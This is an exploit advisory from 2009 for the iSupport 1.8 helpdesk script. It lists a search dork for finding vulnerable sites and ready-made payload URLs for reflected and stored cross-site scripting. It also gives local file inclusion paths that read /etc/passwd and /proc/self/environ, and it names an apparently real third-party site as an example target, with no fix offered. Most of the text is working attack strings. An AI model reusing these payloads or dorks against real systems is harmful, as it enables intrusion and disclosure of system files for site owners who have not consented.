iSupport 1.8 - Cross-Site Scripting / Local File Inclusion

---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------


Discovered by : Stink' & Essandre
DATE : 16/12/09

//////////////////////////////////////////////////////////////////////

Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $

//////////////////////////////////////////////////////////////////////


[+] Vulnerability and Exploitation

Dork : "Powered by [ iSupport 1.8 ]"


--[XSS]--

http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]

Exemple :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E

--[XSS]-- in the member zone

http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" and you have your alert xss:)

--[LFI]--

http://[TARGET]/[PATH]/index.php?include_file=[LFI]

Exemple :

http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd


[+] Solution :

N/A

The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.